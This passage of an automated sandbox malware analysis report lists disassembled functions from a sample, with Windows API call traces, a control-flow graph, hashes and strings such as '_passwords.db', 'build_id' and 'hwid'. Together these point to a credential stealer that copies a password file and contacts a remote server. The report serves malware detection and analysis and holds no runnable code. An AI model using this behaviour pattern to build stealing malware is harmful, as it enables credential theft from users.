                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,00633851,?,?,?,?,00000014), ref: 00408512
                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,00633851,?,?,?,?), ref: 0040851C
                                                                                                                                                                                                                                                  • InternetReadFile.WININET(?,?,000000C7,?), ref: 00408531
                                                                                                                                                                                                                                                  • InternetReadFile.WININET(?,00000000,000000C7,?), ref: 0040857B
                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 0040858F
                                                                                                                                                                                                                                                  • InternetSetOptionA.WININET(?,0000001F,?,00000004), ref: 00408045
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrlenA.KERNEL32(?,?,?,?,?,00407506,?,------,?,?,?,?,00000014), ref: 00413879
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,00407506,?,------,?,?,?,?,00000014), ref: 004138A2
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrcatA.KERNEL32(00000000,?,?,00407506,?,------,?,?,?,?,00000014), ref: 004138AA
                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040859F
                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 004085A6
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,0042EEFC,00000000,?,?,?,?,?,?,?), ref: 00408602
                                                                                                                                                                                                                                                  • RtlFreeHeap.NTDLL(00000000,00000000,?,?,?,?,?,?), ref: 00408611
                                                                                                                                                                                                                                                    • Part of subcall function 004148F3: GetSystemTime.KERNEL32(?,ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890,0042EEFC,00407497,?,00000014), ref: 00414960
                                                                                                                                                                                                                                                    • Part of subcall function 004148F3: lstrlenA.KERNEL32(00000000), ref: 004149BE
                                                                                                                                                                                                                                                    • Part of subcall function 00413806: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,004074A9,?,?,?,00000014), ref: 00413846
                                                                                                                                                                                                                                                    • Part of subcall function 00413806: lstrcatA.KERNEL32(00000000,?,?,004074A9,?,?,?,00000014), ref: 00413850
                                                                                                                                                                                                                                                    • Part of subcall function 004137C0: lstrcpyA.KERNEL32(00000000,?,?,?,?,004074B1,?,?,?,?,00000014), ref: 004137F8
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3437971696.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000436000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000447000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000045A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000484000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000489000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000048D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004BA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004C2000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004DB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004E4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004EA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005AC000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005B9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000643000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000647000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Internet$lstrlen$Heap$CloseHandle$lstrcpy$Process$Free$FileOpenReadlstrcatmemcpy$AllocConnectCrackHttpOptionRequestSleepSystemTime
                                                                                                                                                                                                                                                  • String ID: "$------$build_id$mode
                                                                                                                                                                                                                                                  • API String ID: 2829941862-3829489455
                                                                                                                                                                                                                                                  • Opcode ID: b6ac0e4d20e8280c00ee4a52078a176f0a01ba546a3fa830e67fac002179915b
                                                                                                                                                                                                                                                  • Instruction ID: c4bafd15bbe72c7753f75c76ce33fb2b6cfcd0d70a8ce77783aecb50f14d315a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b6ac0e4d20e8280c00ee4a52078a176f0a01ba546a3fa830e67fac002179915b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5932A5F4A002185BCB15BF729C56AEF7B6BAF81745F00541EF416672D2CE3C9A448BE8
                                                                                                                                                                                                                                                  Function 0040B4F3 Relevance: 35.3, APIs: 19, Strings: 1, Instructions: 269memoryfilestringCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 0041370E: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,004073A7,0042EEFC), ref: 00413732
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrlenA.KERNEL32(?,?,?,?,?,00407506,?,------,?,?,?,?,00000014), ref: 00413879
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,00407506,?,------,?,?,?,?,00000014), ref: 004138A2
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrcatA.KERNEL32(00000000,?,?,00407506,?,------,?,?,?,?,00000014), ref: 004138AA
                                                                                                                                                                                                                                                    • Part of subcall function 00413806: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,004074A9,?,?,?,00000014), ref: 00413846
                                                                                                                                                                                                                                                    • Part of subcall function 00413806: lstrcatA.KERNEL32(00000000,?,?,004074A9,?,?,?,00000014), ref: 00413850
                                                                                                                                                                                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040B5BB
                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000003E8,?), ref: 0040B5DE
                                                                                                                                                                                                                                                  • PathFileExistsA.SHLWAPI(00000000), ref: 0040B5FC
                                                                                                                                                                                                                                                  • CreateFileA.KERNEL32 ref: 0040B634
                                                                                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0040B64B
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 0040B665
                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 0040B68A
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040B6A8
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 0040B6B4
                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000000,000F423F), ref: 0040B6C2
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 0040B6D6
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 0040B70E
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,00000000), ref: 0040B7DE
                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?), ref: 0040B7E9
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 0040B7F1
                                                                                                                                                                                                                                                  • RtlFreeHeap.NTDLL(00000000,00000000,?), ref: 0040B7FC
                                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000), ref: 0040B80F
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 0040B8E1
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040B8EF
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3437971696.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000436000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000447000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000045A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000484000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000489000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000048D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004BA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004C2000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004DB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004E4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004EA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005AC000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005B9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000643000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000647000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Heap$File$Process$lstrcat$lstrcpy$CloseFreeHandle$AllocateCopyCreateDeleteExistsPathReadSizeSleeplstrlen
                                                                                                                                                                                                                                                  • String ID: _passwords.db
                                                                                                                                                                                                                                                  • API String ID: 3175396866-1485422284
                                                                                                                                                                                                                                                  • Opcode ID: 451730505287d6db03fb216a09e53d2cbc0227b1ae60e765f92cb8950668dff5
                                                                                                                                                                                                                                                  • Instruction ID: dd26fa20e6740df926561d89e38a7e43f5c20e24c5d15dedf75b600327ce6420
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 451730505287d6db03fb216a09e53d2cbc0227b1ae60e765f92cb8950668dff5
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E5A1A5B59002199BCB01FFB2DC46AEE7BB9FF45305F404019F811A7191DF78AA85CBA9
                                                                                                                                                                                                                                                  Function 0040B4F2 Relevance: 33.6, APIs: 18, Strings: 1, Instructions: 308memoryfilesleepCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 0041370E: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,004073A7,0042EEFC), ref: 00413732
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrlenA.KERNEL32(?,?,?,?,?,00407506,?,------,?,?,?,?,00000014), ref: 00413879
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,00407506,?,------,?,?,?,?,00000014), ref: 004138A2
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrcatA.KERNEL32(00000000,?,?,00407506,?,------,?,?,?,?,00000014), ref: 004138AA
                                                                                                                                                                                                                                                    • Part of subcall function 00413806: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,004074A9,?,?,?,00000014), ref: 00413846
                                                                                                                                                                                                                                                    • Part of subcall function 00413806: lstrcatA.KERNEL32(00000000,?,?,004074A9,?,?,?,00000014), ref: 00413850
                                                                                                                                                                                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040B5BB
                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000003E8,?), ref: 0040B5DE
                                                                                                                                                                                                                                                  • PathFileExistsA.SHLWAPI(00000000), ref: 0040B5FC
                                                                                                                                                                                                                                                  • CreateFileA.KERNEL32 ref: 0040B634
                                                                                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0040B64B
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 0040B665
                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 0040B68A
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040B6A8
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 0040B6B4
                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000000,000F423F), ref: 0040B6C2
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 0040B6D6
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 0040B70E
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,00000000), ref: 0040B7DE
                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?), ref: 0040B7E9
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 0040B7F1
                                                                                                                                                                                                                                                  • RtlFreeHeap.NTDLL(00000000,00000000,?), ref: 0040B7FC
                                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000), ref: 0040B80F
                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000003E8), ref: 0040B82D
                                                                                                                                                                                                                                                    • Part of subcall function 00413740: lstrcpyA.KERNEL32(00000000,?,?,?,?,0041A972,?), ref: 00413763
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 0040B8E1
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040B8EF
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3437971696.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000436000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000447000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000045A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000484000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000489000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000048D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004BA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004C2000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004DB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004E4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004EA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005AC000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005B9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000643000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000647000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Heap$File$Process$lstrcatlstrcpy$CloseFreeHandleSleep$AllocateCopyCreateDeleteExistsPathReadSizelstrlen
                                                                                                                                                                                                                                                  • String ID: _passwords.db
                                                                                                                                                                                                                                                  • API String ID: 102524898-1485422284
                                                                                                                                                                                                                                                  • Opcode ID: bfb6670bb488a4770a93aa756208dad1c1f5594deac4f8315849cb1c44d8c299
                                                                                                                                                                                                                                                  • Instruction ID: c2ce34365f7a7f117e03430e8c543a584d37913e59bd2e1ff373fdd8620fef08
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bfb6670bb488a4770a93aa756208dad1c1f5594deac4f8315849cb1c44d8c299
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 37C1C5B59006099BCB01EF71CC46AEEB7B9FF55308F008119F81567191EF78AB89CB98
                                                                                                                                                                                                                                                  Function 00406C70 Relevance: 30.3, APIs: 13, Strings: 4, Instructions: 523networkfilestringCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 1786 406c70-406d18 call 413740 call 406be0 call 41370e * 5 call 41398e InternetOpenA StrCmpCA 1803 4072fb-407322 InternetCloseHandle call 4147f4 * 2 call 413740 1786->1803 1804 406d1e-406d5e call 4148f3 call 413806 call 4137c0 call 413770 * 2 1786->1804 1815 407327-40737f call 413770 * 9 1803->1815 1826 406d60-406d70 1804->1826 1827 406d77-406d9d call 413860 call 4137c0 call 413770 1804->1827 1826->1827 1841 406dc0-406dfe call 413860 call 4137c0 call 413770 call 413806 call 4137c0 call 413770 1827->1841 1842 406d9f-406db9 1827->1842 1861 406e00-406e10 1841->1861 1862 406e17-406ec2 call 413860 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 call 413860 call 413806 call 4137c0 call 413770 * 2 InternetConnectA 1841->1862 1842->1841 1861->1862 1862->1803 1885 406ec8-406efd HttpOpenRequestA 1862->1885 1886 406f03-406f10 1885->1886 1887 4072f4-4072f5 InternetCloseHandle 1885->1887 1888 406f12-406f24 InternetSetOptionA 1886->1888 1889 406f2a-406f34 1886->1889 1887->1803 1888->1889 1890 406f36-406f50 1889->1890 1891 406f57-406f95 call 413860 call 4137c0 call 413770 call 413806 call 4137c0 call 413770 1889->1891 1890->1891 1904 406f97-406fa7 1891->1904 1905 406fae-406fee call 413860 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 1891->1905 1904->1905 1918 406ff0-407001 1905->1918 1919 407008-40702b call 413860 call 4137c0 call 413770 1905->1919 1918->1919 1926 407047-407110 call 413860 call 4137c0 call 413770 call 413806 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 call 413806 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 1919->1926 1927 40702d-407040 1919->1927 1970 407130-4071c3 call 413860 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 call 413806 call 4137c0 call 413770 call 41370e call 413806 * 2 call 4137c0 call 413770 * 2 1926->1970 1971 407112-407129 1926->1971 1927->1926 2002 4071c5-407215 call 41398e lstrlenA call 41398e * 2 lstrlenA call 41398e 1970->2002 1971->1970 2012 407272-40728d InternetReadFile 2002->2012 2013 407217-407226 Sleep 2002->2013 2016 4072da-4072e6 InternetCloseHandle call 413770 2012->2016 2017 40728f-407294 2012->2017 2014 407235-40723c 2013->2014 2015 407228-407233 2013->2015 2018 407258-40726d call 41370e call 413770 2014->2018 2019 40723e-407251 2014->2019 2015->2002 2015->2014 2023 4072eb-4072f1 2016->2023 2017->2016 2021 407296 2017->2021 2018->1815 2019->2018 2024 407299-4072d1 call 413860 call 4137c0 call 413770 InternetReadFile 2021->2024 2023->1887 2024->2016 2034 4072d3-4072d8 2024->2034 2034->2016 2034->2024
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00413740: lstrcpyA.KERNEL32(00000000,?,?,?,?,0041A972,?), ref: 00413763
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,004073C4,?), ref: 00406C13
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: ??_U@YAPAXI@Z.MSVCRT(00000400,?), ref: 00406C1F
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?), ref: 00406C2B
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: lstrlenA.KERNEL32(00000000,?,?,?), ref: 00406C4A
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: InternetCrackUrlA.WININET(00000000,00000000,00000000), ref: 00406C5A
                                                                                                                                                                                                                                                    • Part of subcall function 0041370E: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,004073A7,0042EEFC), ref: 00413732
                                                                                                                                                                                                                                                  • InternetOpenA.WININET(?,?,?,?,?), ref: 00406CFD
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,?,?,?,?,?), ref: 00406D10
                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 004072FC
                                                                                                                                                                                                                                                    • Part of subcall function 004148F3: GetSystemTime.KERNEL32(?,ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890,0042EEFC,00407497,?,00000014), ref: 00414960
                                                                                                                                                                                                                                                    • Part of subcall function 004148F3: lstrlenA.KERNEL32(00000000), ref: 004149BE
                                                                                                                                                                                                                                                    • Part of subcall function 00413806: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,004074A9,?,?,?,00000014), ref: 00413846
                                                                                                                                                                                                                                                    • Part of subcall function 00413806: lstrcatA.KERNEL32(00000000,?,?,004074A9,?,?,?,00000014), ref: 00413850
                                                                                                                                                                                                                                                    • Part of subcall function 004137C0: lstrcpyA.KERNEL32(00000000,?,?,?,?,004074B1,?,?,?,?,00000014), ref: 004137F8
                                                                                                                                                                                                                                                  • InternetConnectA.WININET ref: 00406EB4
                                                                                                                                                                                                                                                  • HttpOpenRequestA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00406EF2
                                                                                                                                                                                                                                                  • InternetSetOptionA.WININET(?,0000001F,?,00000004), ref: 00406F24
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrlenA.KERNEL32(?,?,?,?,?,00407506,?,------,?,?,?,?,00000014), ref: 00413879
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,00407506,?,------,?,?,?,?,00000014), ref: 004138A2
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrcatA.KERNEL32(00000000,?,?,00407506,?,------,?,?,?,?,00000014), ref: 004138AA
                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,0042EEFC,?,?,?,?,?,",?,?,build_id), ref: 004071DE
                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 004071FB
                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000BB8), ref: 0040721E
                                                                                                                                                                                                                                                  • InternetReadFile.WININET(?,?,000007CF,?), ref: 00407285
                                                                                                                                                                                                                                                  • InternetReadFile.WININET(?,?,000007CF,?), ref: 004072C9
                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 004072DD
                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 004072F5
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3437971696.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000436000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000447000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000045A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000484000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000489000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000048D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004BA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004C2000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004DB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004E4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004EA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005AC000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005B9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000643000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000647000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Internet$lstrcpylstrlen$CloseHandle$FileOpenReadlstrcat$ConnectCrackHttpOptionRequestSleepSystemTime
                                                                                                                                                                                                                                                  • String ID: "$------$build_id$hwid
                                                                                                                                                                                                                                                  • API String ID: 3613725345-50533134
                                                                                                                                                                                                                                                  • Opcode ID: a226ba48a9e1850e57829bd3354a094638608d2c18dede2ad7c7ec5fa795f12b
                                                                                                                                                                                                                                                  • Instruction ID: 0de5520962e200c6a25ed7e72827b66a405d0f47db110f2e63ec7661919d4967
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a226ba48a9e1850e57829bd3354a094638608d2c18dede2ad7c7ec5fa795f12b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8502C4B4A001185ADB06BF628C95AFF7BBBAB81B49F00401EF416672D1CF3C5A85CBD5
                                                                                                                                                                                                                                                  Function 00408807 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 199networkfileCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
